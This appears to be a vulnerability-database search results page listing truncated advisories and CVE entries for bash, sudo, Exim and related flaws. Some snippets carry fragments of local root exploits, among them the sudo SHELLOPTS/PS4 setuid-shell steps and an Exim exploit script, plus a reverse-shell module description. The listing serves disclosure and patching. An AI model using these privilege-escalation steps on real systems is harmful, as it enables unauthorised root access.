FreeBSD : sudo -- arbitrary command execution (1b725079-9ef6-11da-b410-000e0c2e438a)

Tavis Ormandy reports : The bash shell uses the value of the PS4 environment variable after expansion as a prefix for commands run in execution trace mode. Execution trace mode xtrace is normally set via bash's -x command line option or interactively by running 'set -o xtrace'. However, it may al...

bash security update

CentOS Errata and Security Advisory CESA-2005:206-8 Merged security bulletin from advisories: https://lists.centos.org/pipermail/centos-announce/2006-March/074928.html Affected packages: bash bash-doc...

CVE-2006-0848

The "Open 'safe' files after downloading" option in Safari on Apple Mac OS X allows remote user-assisted attackers to execute arbitrary commands by tricking a user into downloading a MACOSX folder that contains metadata resource fork that invokes the Terminal, which automatically interprets the...

Ubuntu 4.10 : sudo vulnerability (USN-28-1)

Liam Helmer discovered an input validation flaw in sudo. When the standard shell 'bash' starts up, it searches the environment for variables with a value beginning with ''. For each of these variables a function with the same name is created, with the function body filled in from the environment...

Unix Command Shell, Reverse TCP (/dev/tcp)

Creates an interactive shell via bash's builtin /dev/tcp. This will not work on circa 2009 and older Debian-based Linux distributions including Ubuntu because they compile bash without the /dev/tcp feature. This module requires Metasploit: https://metasploit.com/download Current source:...

sudo privilege escalation

few envoronment vaqriables used by bash perl and python are not cleaned...

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

Exploit for linux platform in category local exploits ================================================================ Sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls...

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

CVE-2005-2959

CVE-2005-2959 concerns sudo 1.6.8 and earlier, where the SHELLOPTS and PS4 environment variables are not cleared during privilege-escalation prompts. The result is a local privilege escalation when a user with limited sudo privileges runs a bash script, as these variables can be passed through to...

sudo -- arbitrary command execution

Tavis Ormandy reports: The bash shell uses the value of the PS4 environment variable after expansion as a prefix for commands run in execution trace mode. Execution trace mode xtrace is normally set via bash's -x command line option or interactively by running "set -o xtrace". However, it may als...

CVE-2005-2968

Firefox 1.0.6 and Mozilla 1.7.10 allows attackers to execute arbitrary commands via shell metacharacters in a URL that is provided to the browser on the command line, which is sent unfiltered to bash...

IMail.pl

GFHost explo Spawn bash style Shell with webserver uid Greetz SPAX, foxtwo, Zone-H This Script is currently under development use strict; use IO::Socket; my $host; my $port; my $command; my $url; my @results; my $probe; my @U; $U1 = "/dl.php?a=0.1&OURFILE=ff24404eeac528b"...

CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

DEBIAN-CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

CVE-2004-1051

sudo before 1.6.8p2 allows local users to execute arbitrary commands by using "" style environment variables to create functions that have the same name as any program within the bash script that is called without using the program's full pathname...

Exim <= 4.42 Local Root Exploit

Exploit for linux platform in category local exploits =============================== Exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...

Exim &lt;= 4.42 Local Root Exploit

No description provided by source. !/bin/sh Local Lame R00T sploit for exim = 4.42 by Dark Eagle My First Coding Release In bash Unl0ck Research Team More Effective than C-code. @env.c content: include stdio.h include string.h int mainint argc, char argv char addrptr; addrptr = getenvargv1;...

Exim 4.42 - Local Privilege Escalation

Exim 4.42 - Local Privilege Escalation !/bin/sh Local Lame R00T sploit for exim include int mainint argc, char argv char addrptr; addrptr = getenvargv1; printf"%s @ %p\n", argv1, addrptr; return 0; gcc @env.c -o @env cp @env /usr/bin cd /usr/exim/bin CODE=perl -e 'print...